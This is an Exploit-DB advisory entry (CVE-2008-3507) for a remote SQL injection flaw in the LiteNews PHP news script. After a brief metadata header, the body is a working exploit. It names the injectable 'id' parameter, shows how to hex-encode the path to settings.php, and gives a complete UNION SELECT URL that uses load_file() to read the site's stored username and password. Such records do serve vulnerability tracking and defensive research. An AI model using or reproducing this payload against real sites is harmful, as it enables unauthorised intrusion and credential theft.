LiteNews <= 0.1 id Remote SQL Injection Vulnerability

2008-08-05T00:00:00
ID EDB-ID:6207
Type exploitdb
Reporter Stack
Modified 2008-08-05T00:00:00

Description

LiteNews <= 0.1 (id) Remote SQL Injection Vulnerability. CVE-2008-3507. Webapps exploit for php platform

                                        
                                            litenews-01 &lt;= 1.2 Remote sql injection
# Download   : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations
#                                                                                   #
#Injection Adress :  http://Sitename/litenew//index.php?mode=view&id=   code sql

you need to crypt the directory of settings.php with hex for see the user and password in line 16 & 17

C:\AppServ\www\litenew\settings.php = 0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870

http://Sitename/litenew//index.php?mode=view&id=-1%20union%20select%201,load_file(0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870),3,4,5/*

# milw0rm.com [2008-08-05]